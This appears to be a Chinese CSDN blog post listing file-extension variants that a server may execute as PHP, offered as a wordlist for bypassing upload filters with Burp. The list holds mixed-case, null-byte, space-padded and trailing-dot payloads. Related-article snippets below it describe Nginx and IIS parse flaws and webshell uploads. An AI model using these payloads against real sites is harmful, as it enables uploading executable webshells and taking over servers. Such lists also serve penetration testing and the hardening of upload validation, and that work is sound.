还有哪些文件后缀可被被解析成php文件

最新推荐文章于 2024-08-09 11:17:49 发布
最新推荐文章于 2024-08-09 11:17:49 发布
阅读量542 收藏
点赞数
分类专栏: 网络安全 web安全 文章标签: web安全 文件上传
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XXokok/article/details/134056993
版权

还有哪些文件后缀可被被解析成php文件

在文件上传的时候,被限制了php的文件格式。用以下这些当做后缀格式,有可能可以绕过。可以放在BP里自己跑一下试试。

phtml
php
php3
php4
php5
inc
pHtml
pHp
pHp3
pHp4
pHp5
iNc
iNc%00
iNc%20%20%20
iNc%20%20%20...%20.%20..
iNc......
inc%00
inc%20%20%20
inc%20%20%20...%20.%20..
inc......
pHp%00
pHp%20%20%20
pHp%20%20%20...%20.%20..
pHp......
pHp3%00
pHp3%20%20%20
pHp3%20%20%20...%20.%20..
pHp3......
pHp4%00
pHp4%20%20%20
pHp4%20%20%20...%20.%20..
pHp4......
pHp5%00
pHp5%20%20%20
pHp5%20%20%20...%20.%20..
pHp5......
pHtml%00
pHtml%20%20%20
pHtml%20%20%20...%20.%20..
pHtml......
php%00
php%20%20%20
php%20%20%20...%20.%20..
php......
php3%00
php3%20%20%20
php3%20%20%20...%20.%20..
php3......
php4%00
php4%20%20%20
php4%20%20%20...%20.%20..
php4......
php5%00
php5%20%20%20
php5%20%20%20...%20.%20..
php5......
phtml%00
phtml%20%20%20
phtml%20%20%20...%20.%20..
phtml......

梧六柒
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
RTP协议解析----Header扩展数据
machh的专栏
06-15 1841
参考RFC3550中关于rtp扩展头的定义 5.3.1 RTP Header Extension An extension mechanism is provided to allow individual implementations to experiment with new payload-format-independent functions that require additional information to be carried in the RTP data packe.
小程序对文件后缀解析
03-29
小程序对文件后缀解析 引用微信开放平台文档 1、后缀: 1.1、WXSS: 样式文件(类似CSS) WXSS 具有 CSS 大部分的特性,小程序在 WXSS 也做了一些扩充和修改。 新增了尺寸单位。在写 CSS 样式时,开发者...
PHP文件后缀-图片头格式2021-10-28
qq_53030229的博客
10-28 886
1、PHP图片后缀 ".php",".php5",".php4",".php3",".php2",“php1”,".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",“pHp1”,".Html",".Htm",".pHtml"" 2、图片头格式 添加链接描述
PHP获取文件后缀名(提供7种方法)
热门推荐
倾城一笑stu
09-22 4万+
1.$file = 'x.y.z.png'; echo substr(strrchr($file, '.'), 1); 解析:strrchr($file, '.')     strrchr() 函数查找字符串在另一个字符串中最后一次出现的位置,并返回从该位置到字符串结尾的所有字符 2.$file = 'x.y.z.png'; echo substr($file, strrpos($fil
phpinfo查看可以解析后缀_7种获取PHP文件后缀名的方法
weixin_39752434的博客
12-22 750
本篇文章给大家分享的内容是7种获取PHP文件后缀名的方法,有着一定的参考价值,有需要的朋友可以参考一下第一种:$file = 'x.y.z.png';echo substr(strrchr($file, '.'), 1);解析:strrchr($file, '.')strrchr() 函数查找字符串在另一个字符串中最后一次出现的位置,并返回从该位置到字符串结尾的所有字符第二种:$file = 'x...
将jpg文件当作php文件解析,解析漏洞
weixin_34502439的博客
04-06 1609
1、漏洞简介解析漏洞是指web服务器因对http请求处理不当导致将非可执行的脚本,文件等当做可执行的脚本,文件等执行。该漏洞一般配合服务器的文件上传功能使用,以获取服务器的权限。2、漏洞因、检测及利用使用了低版本的,存在漏洞的web服务器。解析漏洞有以下几种:IIS 5.x/6.0解析漏洞目录解析:在网站下建立文件夹的名称中带有.asp、.asa等可执行脚本文件后缀后缀文件夹,其目录内的任何...
文件解析漏洞总结-Nginx
1stPeak's Blog
03-25 809
Nginx解析漏洞 原理:在任意文件名后面添加如/*.php,nginx都会将该文件当做php文件类型,交给php解析执行 例:xx.jpg,其中源码为<?php phpinfo();?> 访问xx.jpg时,在xx.jpg后面添加/xx.php,即可实现nginx解析漏洞,将xx.jpg以php解析执行 我们将上述情况做个实验:这里我使用的是集环境phpstudy 浏览器访问:...
PHP实现获取文件后缀名的几种常用方法
10-23
PHP编程中,获取文件后缀名是一项常见的任务,它对于处理不同类型文件或者根据文件类型进行操作至关重要。这里,我们将详细探讨三种不同的方法来实现这一功能。 ### 方法1:基于字符串操作 ```php function get_...
php 文件上传后缀名与文件类型对照表(几乎涵盖所有文件)
12-17
网上有很多php文件上传的类,文件上传处理是php的一个特色(至少手册上是将此作为php特点来展示的,个人认为php在数组方面的优异功能更有特色),学php的人都知道文件上传怎么做,但很多人在编程中却可能忽视了一些细节...
python获取指定路径下所有指定后缀文件的方法
09-22
### Python 获取指定路径下所有指定后缀文件的方法 在日常的开发工作中,我们经常会遇到需要批量处理特定格式文件的需求,比如备份、分析日志文件、提取数据等场景。Python 提供了强大的文件与目录操作功能,能够...
PHP修改后缀名绕过
whatiwhere的博客
11-15 1万+
实验环境 操作机: Windows XP 目标机:Windows 2003 目标网址:www.test.com 实验目的 了解php扩展名解析原则 学会利用修改后缀名绕过上传防护 实验工具 中国菜刀:是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理,本次试验主要用到其动态脚本管理功能 实验内容 实验步骤 步骤1:上传...
Nginx更改PHP解析后缀
PHPer的技术记录
11-13 5368
location ~ .*\.(php|do)?$                         {                                 try_files $uri =404;                                 fastcgi_pass  unix:/tmp/php-cgi.sock;
php解析asp,php 简单的路由解析 可以随意设置后缀(html,do,shtml,aspx等等)
weixin_34976470的博客
03-25 231
[php]if(isset($_SERVER['PATH_INFO'])){$str=substr($_SERVER['PATH_INFO'],0,strpos($_SERVER['PATH_INFO'],'.'));//获取路径信息(pathinfo)$pathinfo=explode('/',trim($str,'/'));//获取$_GET['m']$_GET['m']=(!emptyemp...
使php程序无后缀名也能解析的apache 设置
那些花儿
03-03 4579
DefaultType  application/x-httpd-php如果想要解析为其他后缀AddType application/x-httpd-php .ext
php之——如何使apache服务器能够解析.phtml和.php3后缀文件
wsnbbz的博客
12-09 2516
1.找到apache的配置文件D:\phpstudy\PHPTutorial\Apache\conf\httpd.conf 2.打开找到<IfModule mime_module>的最后一行,取消注释,加入phtml .php3 3.新建后缀为phtml或.php3的php文件就可使用apache识别 ...
web安全深度剖析】笔记——上传漏洞
ZhShy
01-16 303
IIS6.0解析漏洞 当文件夹名命名为XX.asa或XX.asp时,文件夹中的所有文件都会被当做asp文件来执行 当文件命名为*.asp;1.jpg时,此文件会被当做asp文件来执行 WebDav漏洞:开启webdav后,可扩展move、copy、delete等HTTP方法,此时即可put一个a.txt写入一句话木马,并通过copy或move改名为xx.asp,这样即可轻松上传一个webshel...
《密码编码学与网络安全原理与实践》第九章 第十章 公钥密码学与密钥管理
最新发布
m0_57291352的博客
08-09 905
原则上不能说传统密码优于公钥密码,也不能说公钥密码优于传统密码公钥密码学仅限于用在密钥管理和签名这类应用中与密钥分配中心的会话过程既不比传统密码中的那些过程更简单,也不比之更有效动机:简化密钥分配和管理、实现签名等功能不对称性是公钥最为重要的性质,可以用来保证“真实”性,“不可否认”性非对称密钥:两个密钥:公钥和私钥,用来实现互补运算,即加密和解密,或者生签名与验证签名;公钥证书:认证机构将用户的姓名和公钥绑定在一起,用户用自己的私钥对数字文件签名后,可以通过证书识别签名者,因为签名者是唯一拥有与证书上对
【网络安全】本地文件包含及远程文件包含漏洞详解
goldfish8848的博客
08-05 918
开发人员将需要重复调用的函数写入一个文件,对该文件进行包含时产生的操作。这样编写代码能减少冗余,降低代码后期维护难度。保证网站整体风格统一:导航栏、底部footer栏等,把这些不会变的东西包含在一个文件中,可以保证整体效果的统一和代码量的减少。
BLOB类型获取文件后缀
05-24
BLOB类型是一种二进制数据类型,在数据库中通常用来存储图片、音频、视频等文件。如果想要获取BLOB类型文件后缀,需要从文件的二进制数据中解析文件类型的标识符。 一般来说,文件类型的标识符存在于文件的开头部分。例如,JPEG文件的标识符为“FF D8”,PNG文件的标识符为“89 50 4E 47 0D 0A 1A 0A”,GIF文件的标识符为“47 49 46 38 39 61”或“47 49 46 38 37 61”。 因此,如果要获取BLOB类型文件后缀,可以先读取文件的前几个字节,然后将这些字节与文件类型的标识符进行比较,从而确定文件的类型和后缀。例如,可以使用Java语言的ByteArrayInputStream和DataInputStream类来读取BLOB类型数据,并使用if语句来判断文件的类型和后缀,如下所示: ```java byte[] data = // 从数据库中读取BLOB类型数据 ByteArrayInputStream bais = new ByteArrayInputStream(data); DataInputStream dis = new DataInputStream(bais); // 读取文件的前几个字节 byte[] header = new byte[8]; dis.readFully(header); // 判断文件类型和后缀 if (Arrays.equals(header, new byte[]{(byte)0xFF, (byte)0xD8})) { // JPEG文件 String extension = "jpg"; } else if (Arrays.equals(header, new byte[]{(byte)0x89, (byte)0x50, (byte)0x4E, (byte)0x47, (byte)0x0D, (byte)0x0A, (byte)0x1A, (byte)0x0A})) { // PNG文件 String extension = "png"; } else if (Arrays.equals(header, new byte[]{(byte)0x47, (byte)0x49, (byte)0x46, (byte)0x38, (byte)0x39, (byte)0x61}) || Arrays.equals(header, new byte[]{(byte)0x47, (byte)0x49, (byte)0x46, (byte)0x38, (byte)0x37, (byte)0x61})) { // GIF文件 String extension = "gif"; } else { // 其他类型的文件 String extension = null; // 或者抛出异常等处理 } ``` 需要注意的是,文件类型的标识符并不是唯一的,有些文件类型可能有多个标识符。此外,对于一些特殊的文件类型,可能需要读取更多的字节才能确定文件类型和后缀
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值